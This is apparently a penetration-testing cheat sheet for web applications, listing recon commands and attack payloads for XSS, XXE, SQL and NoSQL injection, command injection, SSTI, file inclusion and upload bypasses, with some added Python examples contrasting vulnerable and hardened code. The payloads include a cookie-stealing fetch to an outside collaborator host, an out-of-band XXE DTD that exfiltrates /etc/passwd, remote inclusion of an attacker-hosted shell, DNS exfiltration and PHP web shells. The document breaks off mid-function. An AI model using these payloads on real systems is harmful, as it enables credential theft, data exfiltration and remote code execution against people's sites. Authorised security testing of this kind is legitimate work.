Table of Contents
- https://www.securitydrops.com/the-web-api-authentication-guide/
- https://beeceptor.com/
- http://dnslog.cn/
- https://webhook.site/
- http://receive-sms-online.com/
- http://freesmsverification.com/
- https://hs3x.com/
- http://sms.sellaite.com/
- https://pentestbook.six2dez.com/enumeration/web/general-info
- https://book.hacktricks.xyz/pentesting/pentesting-web
- Burp Suite
- Dirbusting
- XSS
- XXE
- XXE-OOB
- SQL injection
- NoSQL Injection
- Command Injection
- CSRF
- SSRF
- SSTI
- LFI
- RFI
- File Upload Bypass
- Clickjacking
- Session fixation
- Java Platform
- LDAP injection
- Host Header Injection
- Web Cache Poisoning
- Open Redirect
- HTTP Smuggling
- CORS
- IDOR
- SAML
- CMS
- CRLF
- WebSockets
- JWT
- GWT
- GraphQL
- MongoDB
- AWS
- Link finder
- Bing -> ip:79.98.28.23
theharvester -d example.com -b all
curl -s "http://web.archive.org/cdx/search/cdx?url=something.example.com/*&output=text&fl=original&collapse=urlkey"
# SHODAN CLI
# Shodan init
shodan init API_KEY
# Shodan get host info
shodan host IP
openssl s_client -connect domainlmao.com:443 < /dev/null | openssl x509 -noout -text | grep -C3 -i dns
- TCP: grc nmap -sC -sV -vv -p- 10.10.10.120 -T5
- UDP: grc nmap -sU -sV -vv -oA quick_udp 10.10.10.10
- VULN: grc nmap --script vuln IP
sslscan www.example.com
testssl www.example.com
dig axfr @xyz.domain.com xyz.domain.com
nikto -h www.example.com
# Nikto through Burp Suite
vim /etc/nikto.conf -> LW_SSL_ENGINE=SSLeay
nikto -h www.domain.es:443 -useproxy http://127.0.0.1:8080/
pip install wapiti3
# Wapiti through Burp Suite
wapiti -u https://domain/ -n 5 -b domain -p http://127.0.0.1:8080
https://github.com/projectdiscovery/nuclei
# Outdated, but good for old systems or OSCP
https://github.com/hatRiot/clusterd
clusterd -i URL
# Cool Burp plugins (in no particular order)
* https://github.com/synacktiv/HopLa
* .NET Beautifier
* Active Scan++
* Backslash powered scanner
* CMS Scanner
* Collaborator everywhere
* CMI Attacker
* Content type converter
* CSRF Scanner
* Error message checks
* Exiftool scanner
* Freddy
* HTML5 Auditor
* HTTP Request Smuggler
* J2EEScan
* https://github.com/silentsignal/burp-log4shell
* Java deserialization scanner
* java serial killer
* JS link finder
* JSON Decoder
* Json web tokens attacker
* NGINX alias traversal
* PHP object injection check
* Reflected params
* Retire.js
* SAML Raider
* Software vuln scanner
* SSL Scanner
* Upload Scanner
* Web Cache deception scanner
* Logger++
* JSON Web Tokens
* SSRF-King
* AWS Security Checks
* Additional Scanner checks
* Autorize
- Copy the session cookie of an unprivileged user
- Paste it into the Autorize extension in Burp
- Tick "Intercept requests from Repeater"
- Autorize ON
- Browse the web app as the privileged/admin user; Autorize replays every request with the low-privilege cookie and flags the ones that still succeed
- GG WP
- Wfuzz
wfuzz -c --hc=404 -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://IP:PORT/FUZZ
wfuzz -c --hc=404 -z file,/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt https://IP:PORT/FUZZ
- ffuf
# Normal directory bruteforce.
ffuf -c -w /path/to/wordlist -u https://IP:PORT/FUZZ
# Directories + extensions, recursive (every extension needs its leading dot, .gz included)
ffuf -mc all -c -u http://10.10.10.168:8080/FUZZ -w /SecLists/Discovery/Web-Content/raft-large-directories.txt -e .js,.php,.bak,.txt,.asp,.aspx,.jsp,.html,.zip,.jar,.sql,.json,.old,.gz,.shtml,.log,.swp,.yaml,.yml,.config,.save,.rsa,.ppk -recursion -recursion-depth 4
# VHOST discovery
ffuf -c -w wordlist.xd -u URL -H "Host: FUZZ.url"
# GET param fuzzing
ffuf -w /path/to/paramnames.txt -u https://target/script.php?FUZZ=test_value -fs 4242
ffuf -w /path/to/values.txt -u https://target/script.php?valid_name=FUZZ -fc 401
# POST data fuzzing
ffuf -w /path/to/postdata.txt -X POST -d "username=admin&password=FUZZ" -u https://target/login.php -fc 401
# Route through proxy
ffuf -x socks5://IP:PORT
- GoBuster
#Old gobuster
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux -x .txt,.php
#New gobuster (-s and the default -b 404 blacklist are mutually exclusive, so clear the blacklist)
gobuster dir -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 80 -x php,txt,html,htm,bak,tmp,temp -s 200,204,301,302,307 -b ""
# VHOST Discovery
gobuster vhost -u hackycorp.com -w /SecLists/Discovery/DNS/subdomains-top1million-110000.txt
- IIS
# IIS ShortName Scanner
https://github.com/irsdl/IIS-ShortName-Scanner
java -jar iis_shortname_scanner.jar 2 20 URL
# After finding the 8.3 short names, fuzz the rest of each file name
./crunch 0 3 abcdefghijklmnopqrstuvwxyz0123456789 -o 3chars.txt
ffuf -w final_crunch_wordlist.txt -D -e asp,aspx,ashx,asmx -t 1000 -c -u http://lmao/initialWordFUZZ
# Can you read the web.config file? Cool.
* Obtain the machineKey variable ( validationKey and decryptionKey)
* VIEWSTATE → ObjectStateFormatter (insecure deserialization) → RCE
https://github.com/0xacb/viewgen
# WebResource.axd:
https://github.com/inquisb/miscellaneous/blob/master/ms10-070_check.py
# ASP - force error paths
/con/
/aux/
con.aspx
aux.aspx
# HTTPAPI 2.0 404 Error
Change Host header to correct subdomain
Add to /etc/hosts
Scan again including IIS Shortnames
# MSF
use auxiliary/scanner/iis_shortname_scanner
- .DS_Store
https://github.com/lijiejie/ds_store_exp
[DOM] -> Payload never has to reach the server; client-side JS reads it (URL, fragment, postMessage) and writes it into the DOM
[STORED] -> Saved server-side (database, log, profile field) and served to other users later
[REFLECTED] -> Returned straight back in the response: error message, search result or any other echo of the input
http://www.jsfuck.com/
<script>([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()</script>
<script>$=~[];$={___:++$,$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$:({}+"")[$],$_$:($[$]+"")[$],_$:++$,$_:(!""+"")[$],$__:++$,$_$:++$,$__:({}+"")[$],$_:++$,$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$=($.$+"")[$.__$])+((!$)+"")[$._$]+($.__=$.$_[$.$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$=$.$+(!""+"")[$._$]+$.__+$._+$.$+$.$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$+"\""+$.$_$_+(![]+"")[$._$_]+$.$_+"\\"+$.__$+$.$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E
<svg onload=alert('XSS')
"><script>alert(1)</script>
<script>alert(document.cookie);</script>
<script>alert(1)</script>
pentest<marquee onstart=confirm(1)>
<script>alert("hello")</script>
<a onmouseover="alert(13)">xxs link</a>
<img src="a.jpg" onerror="javascript:alert(1)"/>
' onerror='alert(1)';
javascript:alert(1)
<body onload=alert("XSS")>
<img src=x onError=alert('xss')>
"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
\"-alert(1)}//
# xss , sqli, ssti
'"><svg/onload=alert()>{{7*7}}
#DOM
blopblop</option></select><img src="" onerror="alert('lmao')">
German#<script>alert('LMAO')</script>
#Blacklist bypass
1. " for ' and vice versa according to where the injection lands
2. alert(1) for (confirm)(1) or confirm`1` or confirm(1) or print()
3. // for <!--
4. spaces for / or %0A, %0C or %0D.
# Steal cookie with burp collaborator and stored XSS
<script>
fetch('https://BURP-COLLABORATOR-SUBDOMAIN', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>
https://netsec.expert/posts/xss-in-2021/
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
https://github.com/s0md3v/XSStrike
https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>%26test%3B</root>
https://backtrackacademy.com/articulo/explorando-la-vulnerabilidad-xxe-xml-external-entity
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection
# Example
Let's say the web sends this
Content-type: application/json
{"message":"135601360123502401401250"}
# Changing the Content-Type to application/xml yields an XML parser error, which means the endpoint will parse XML, not only JSON.
# Convert the JSON above to XML: the response is the same as for the original JSON request, so the server really is
# parsing our XML, which means a potential XXE.
<?xml version="1.0" ?>
<!DOCTYPE message [
<!ELEMENT message ANY>
]>
<message>135601360123502401401250</message>
# Another payload to do the same:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
<!ELEMENT message (#PCDATA)>
<!ENTITY id '135601360123502401401250'>
]>
<message>&id;</message>
# Cool, let's try to load a file from another server
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
<!ELEMENT message (#PCDATA)>
<!ENTITY id '135601360123502401401250'>
<!ENTITY % dtd SYSTEM "https://google.com">
%dtd;
]>
<message>&id;</message>
# The external fetch does not work, but our URL is reflected in the response.
# We can try to load local files with:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
<!ELEMENT message (#PCDATA)>
<!ENTITY id '135601360123502401401250'>
<!ENTITY % dtd SYSTEM "/etc/passwd">
%dtd;
]>
<message>&id;</message>
# Again nothing, but this time we get a markup error.
# Combine both behaviours: force a markup error whose message contains the file contents, by redefining an entity of a DTD that exists locally on the server (error-based XXE via local DTD).
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
<!ELEMENT message (#PCDATA)>
<!ENTITY id '135601360123502401401250'>
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file://flag">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
<message>&id;</message>
If we can't see the response, or run into character/file restrictions, we have to go out-of-band (OOB). We define our own external DTD (Document Type Definition) to perform the OOB XXE: the parser fetches it from our server, and because the DTD is a separate file it can hold all of the attack/exfil payloads and sidestep most character limitations of the injection point.
# ATTACK STAGES:
1. Modified XXE XML attack
2. The vulnerable XML parser grabs a DTD file from the attacker's server.
3. The DTD file contains code to read the /etc/passwd file.
4. The DTD file contains code to exfil the contents (potentially encoded) to the attacker.
payload.dtd
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://[your_ip]:8888/collect=%file;'>">
%all;
Prepare netcat
nc -lvp 8888
Prepare web server
python3 -m http.server 80
# php://filter only exists when the parser is PHP's libxml; on other stacks read file:///etc/passwd directly (multi-line files then break the URL, which is why the base64 wrapper is used here).
BURP
<?xml version="1.0"?><!DOCTYPE thp [<!ELEMENT thp ANY ><!ENTITY % dtd SYSTEM "http://[your_ip]/payload.dtd"> %dtd;]><thp><error>%26send%3B</error></thp>
http://url.com/cat.php?id=2%20union%20select%201,table_name,3,4%20from%20information_schema.tables
Detection of an SQL injection entry point
Simple characters
'
%27
"
%22
#
%23
;
%3B
)
Wildcard (*)
Multiple encoding
%%2727
%25%27
Merging characters
`+HERP
'||'DERP
'+'herp
' 'DERP
'%20'HERP
'%2B'HERP
Logic Testing
page.asp?id=1 or 1=1 -- true
page.asp?id=1' or 1=1 -- true
page.asp?id=1" or 1=1 -- true
page.asp?id=1 and 1=2 -- false
Weird characters
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) may be transformed into U+0022 QUOTATION MARK (") by a normalisation layer
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) may be transformed into U+0027 APOSTROPHE (')
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
https://support.portswigger.net/customer/portal/articles/2791040-using-burp-with-sqlmap
https://github.com/RhinoSecurityLabs/SleuthQL
find . -name "*.txt" -exec sqlmap --batch -r {} \;
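# Added example, not part of the original notes: the logic test above (or 1=1 / and 1=2) and a UNION pull, run against a constructed in-memory SQLite database standing in for a real target. lookup_vulnerable pastes the id into the query text the way cat.php?id= does; lookup_hardened binds it. sqlite_master stands in for information_schema.tables, which SQLite does not have.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for the target's backend."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products(id INTEGER, name TEXT, price INTEGER)")
    con.executemany("INSERT INTO products VALUES (?, ?, ?)",
                    [(1, "widget", 10), (2, "gadget", 25)])
    con.execute("CREATE TABLE users(id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'admin', 'S3cr3t!')")
    return con


def lookup_vulnerable(con, raw_id: str):
    """cat.php?id=... style: the parameter is pasted straight into the SQL text."""
    sql = f"SELECT id, name, price FROM products WHERE id = {raw_id}"
    return con.execute(sql).fetchall()


def lookup_hardened(con, raw_id: str):
    """Parameter binding: the value can never change the structure of the query."""
    return con.execute("SELECT id, name, price FROM products WHERE id = ?",
                       (int(raw_id),)).fetchall()


def is_boolean_injectable(con, lookup) -> bool:
    """The logic test from the notes: 'or 1=1' must return more than the baseline
    and 'and 1=2' less, otherwise the parameter is not live."""
    try:
        baseline = lookup(con, "1")
        true_case = lookup(con, "1 or 1=1 -- ")
        false_case = lookup(con, "1 and 1=2 -- ")
    except (ValueError, sqlite3.Error):
        return False
    return true_case != baseline and false_case != baseline
```

On the vulnerable path "0 union select 1, name, 3 from sqlite_master where type='table'" enumerates table names just as the information_schema payload above does; the hardened path raises before the database ever sees the string.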
NoSQL injection typically occurs when: (1) the endpoint accepts JSON (or bracket-style form data) in the request and passes it to a NoSQL database, and (2) we can manipulate the query with NoSQL comparison operators to change what it matches.
A common example of a NoSQL injection would be injecting something like:
[{"$gt":""}] -> This object says "greater than the empty string". Since every non-empty string is greater than "", the condition is true for any stored value, letting us bypass or inject into NoSQL queries. It is the equivalent of [' or 1=1--] in the SQL injection world. In MongoDB we can use one of the following conditional operators:
- (>) greater than - $gt
- (<) less than - $lt
- (>=) greater than equal to - $gte
- (<=) less than equal to - $lte
# Example:
1-> {"username":"admin","password":"admin"}
2-> {"username":"admin","password":{"$gt":""}}
username=admin&password[$gt]=&submit=login
username[$gt]=admin&password[$gt]=&submit=login
https://www.owasp.org/index.php/Command_Injection
# Common injections
&&
|
;
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls||id; ls ||id; ls|| id; ls || id # Execute 2nd only if 1st fails (handy when the original command errors on our input)
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe; only the 2nd's output comes back)
ls&&id; ls &&id; ls&& id; ls && id # Execute 2nd only if 1st succeeds
ls&id; ls &id; ls& id; ls & id # Execute both; the 1st is backgrounded so you usually only see the 2nd's output
ls %0A id # %0A Execute both (RECOMMENDED)
PHP assert() with an error -> /?name=hacker'.system("cmd").'
Ruby eval() with an error -> /?username=hacker"%2b`whoami`%2b"
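# Added example, not from the original notes: the separators listed above fed to a shell=True call versus an argv list behind an allowlist. The echo is a constructed stand-in for whatever binary the app really invokes (ping, nslookup, whois...). The INJ""ECTED marker only collapses to INJECTED if a shell actually parsed the string, so a literal echo of the input cannot produce a false positive.

```python
import re
import subprocess

# Constructed payloads built from the separators above. The shell drops the empty
# "" inside INJ""ECTED, so the marker INJECTED appears only if a shell ran the string.
PAYLOADS = [
    '127.0.0.1; echo INJ""ECTED',
    '127.0.0.1 | echo INJ""ECTED',
    '127.0.0.1 && echo INJ""ECTED',
    '127.0.0.1 `echo INJ""ECTED`',
    '127.0.0.1 $(echo INJ""ECTED)',
    '127.0.0.1\necho INJ""ECTED',     # what %0A becomes after URL decoding
]

HOSTNAME_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")


def lookup_vulnerable(host: str) -> str:
    """Builds one shell string from user input; every metacharacter is live.
    echo is a constructed stand-in for the real binary the app would call."""
    return subprocess.run(f"echo resolving {host}", shell=True,
                          capture_output=True, text=True).stdout


def lookup_hardened(host: str) -> str:
    """Allowlist-validate, then pass argv as a list: no shell ever parses it."""
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError(f"rejected hostname: {host!r}")
    return subprocess.run(["echo", "resolving", host],
                          capture_output=True, text=True).stdout


def injected(output: str) -> bool:
    """True when the marker command ran, i.e. a second command executed."""
    return "INJECTED" in output


def rejects(host: str) -> bool:
    """True when the hardened path refuses the input before running anything."""
    try:
        lookup_hardened(host)
    except ValueError:
        return True
    return False
```

Note that `||` is absent from the list: with a command that succeeds on the benign part it never runs the injected half, which is exactly the caveat on the `ls || id` line above.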
# DNS exfiltration
Example:
Say we have a page with a command injection we can trigger with "&" but no output comes back; confirm it and exfiltrate over DNS.
dnschef --fakeip=10.10.10.106 -i your_ip --logfile=exfil [ Setup fake DNS server ]
tail -f exfil | grep --line-buffered cooking | cut -d' ' -f11 [ Parse output file ]
Injection: & nslookup this.is.a.test your_ip
If we see the "this.is.a.test" string in our fake DNS, the server is vulnerable.
Windows exfiltration:
& for /f "usebackq tokens=1,2 delims=\" %i in (`whoami`) do nslookup %i_%j your_ip
Example:
* Select a request anywhere in Burp Suite Professional that you want to test or exploit.
* From the right-click context menu, select Engagement tools / Generate CSRF PoC.
* Burp Suite will generate some HTML that will trigger the selected request (minus cookies, which will be added automatically by the victim's browser).
* You can tweak various options in the CSRF PoC generator to fine-tune aspects of the attack. You might need to do this in some unusual situations to deal with quirky features of requests.
* Copy the generated HTML into a web page, view it in a browser that is logged in to the vulnerable web site, and test whether the intended request is issued successfully and the desired action occurs.
# Anti-CSRF token on automated tasks with burp
https://portswigger.net/support/using-burp-suites-session-handling-rules-with-anti-csrf-tokens
https://www.imperva.com/learn/application-security/csrf-cross-site-request-forgery/
https://www.owasp.org/index.php/Testing_for_CSRF_(OTG-SESS-005)
https://support.portswigger.net/customer/portal/articles/1965674-using-burp-to-test-for-cross-site-request-forgery-csrf-
https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978
https://github.com/swisskyrepo/SSRFmap
https://github.com/epinna/tplmap
* Marks the injection point
python tplmap.py -u "http://chat:3000/ti?user=*&comment=*&link=*"
#Popular Template Engines
•PHP – Smarty, Twig
•Java – Velocity, FreeMarker
•Python – Jinja2, Mako, Tornado
•JavaScript – Jade (Pug), Rage
•Ruby – Liquid, ERB
# Payloads
Same as XSS: if you find an XSS, try SSTI at the same injection point
<%=+7*7+%>
<%=+system("cat+/home/carlos/morale.txt")+%>
${7*7}
{{7*7}}
{{7*7'}}
a{*comment*}b
${"z".join("ab")}
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
https://sushant747.gitbooks.io/total-oscp-guide/content/local_file_inclusion.html
../../../etc/passwd
../../../etc/passwd%00
%252e%252e%252fetc%252fpasswd
..///////..////..//////etc/passwd
....//....//....//....//etc/passwd
../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
../../../../[…]../../../../../etc/passwd
expect://whoami
data:text/plain;,<?php echo shell_exec($_GET['cmd']);?>
php://filter/convert.base64-encode/resource=index.php
https://github.com/P0cL4bs/Kadimus
To bypass an appended extension you can add a null byte: %00 (PHP < 5.3.4 only)
http://192.168.1.34/vulnerabilities/fi/?page=https://www.attacker.com/shell.php
http://192.168.1.34/vulnerabilities/fi/?page=HTTPS://www.attacker.com/test.txt%00
http://192.168.1.34/vulnerabilities/fi/?page=file:///E:\xampp\htdocs\prueba.txt
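# Added example, not from the original notes: why the ....// and %252e%252e%252f payloads above get past a strip-once filter, next to a containment check that does not. WEB_ROOT and the decode-filter-decode pipeline are constructed assumptions about the target, not any particular framework.

```python
import os
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"   # assumed document root (constructed for the example)


def naive_sanitize(path: str) -> str:
    """Common broken filter: strip '../' in a single pass. The '....//' and
    '%252e%252e%252f' payloads from the notes are written to defeat exactly this."""
    return path.replace("../", "")


def resolve_vulnerable(user_path: str) -> str:
    """Web server decodes once, the filter runs, then the framework decodes again:
    the classic double-decoding bug, so %252e survives the filter as %2e."""
    once = unquote(user_path)          # %252e -> %2e
    filtered = naive_sanitize(once)
    twice = unquote(filtered)          # %2e -> .
    return os.path.normpath(os.path.join(WEB_ROOT, twice))


def resolve_hardened(user_path: str, root: str = WEB_ROOT) -> str:
    """Decode exactly once, refuse NUL bytes and leftover encoding, canonicalise,
    and require the result to stay inside root. Returns the path or raises."""
    decoded = unquote(user_path)
    if "\x00" in decoded or "%" in decoded:
        raise ValueError("encoded or NUL characters left after decoding")
    full = os.path.normpath(os.path.join(root, decoded.lstrip("/")))
    if os.path.commonpath([root, full]) != root:
        raise ValueError(f"traversal outside {root}: {full}")
    return full


def hardened_rejects(user_path: str) -> bool:
    try:
        resolve_hardened(user_path)
    except ValueError:
        return True
    return False
```

The `....//` form is the instructive one: the filter removes the inner `../` and leaves `../` behind, so one pass of filtering produces the very thing it was meant to remove. The hardened version does not try to remove anything; it computes where the path ends up and refuses anything outside the root.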
Set filename to sleep(10)-- -.jpg and you may be able to achieve a SQL injection
shell.png.png [ Intercept with Burp and change the name to shell.php ]
shell.php [ Change Content-Type from application/octet-stream to image/jpeg ]
shell.php [ Content-Type image/gif and start the file with GIF89a; ]
shell.php5 shell.php4 ...
shell.PhP shell.phP shell.pht ...
shell.php;jpeg [ , & | ]
shell.php/./././[...]
shell.php ... ...... [ Add spaces or dots ]
shell.php.sfdfwewfejpg
shell.php%001.jpg or shell.php\x00.jpg [ Alternative: upload shell.phpD.jpg and in the raw request change the byte 0x44 ("D") to 0x00 ]
../../../../logo.jpg [ Maybe you can replace webpage images ]
exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' myFile.jpeg
mv myFile.jpeg myFile.php.jpeg
https://thibaudrobin.github.io/articles/bypass-filter-upload/
# Allows .svg ?
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
# Allows .zip? , then create a symbolic link
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
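# Added example, not from the original notes: an extension blocklist plus Content-Type trust, as found on many upload handlers, against the shell.PhP / shell.php5 / shell.php%00.jpg tricks above, next to an allowlist-and-magic-bytes check. The file names and PHP bodies are constructed; stored_name models the NUL truncation a C-based handler performs on the name.

```python
import os
import secrets

# Allowed extensions and the magic bytes a file with that extension must start with.
ALLOWED = {".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff",
           ".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8"}
EXEC_BLOCKLIST = {"php"}


def accept_weak(filename: str, content_type: str, data: bytes) -> bool:
    """Blocklist on the extension exactly as typed, plus trust in the client's Content-Type."""
    ext = filename.rsplit(".", 1)[-1] if "." in filename else ""
    if ext in EXEC_BLOCKLIST:
        return False
    return content_type.startswith("image/")


def stored_name(filename: str) -> str:
    """What a C-based server or handler actually writes: the name cut at the first NUL."""
    return filename.split("\x00", 1)[0]


def accept_hardened(filename: str, content_type: str, data: bytes) -> str:
    """Allowlist the final extension (lower-cased), reject control and path characters,
    check the magic bytes, and store under a server-generated name. Content-Type is
    attacker-controlled and deliberately ignored. Returns the stored name or raises."""
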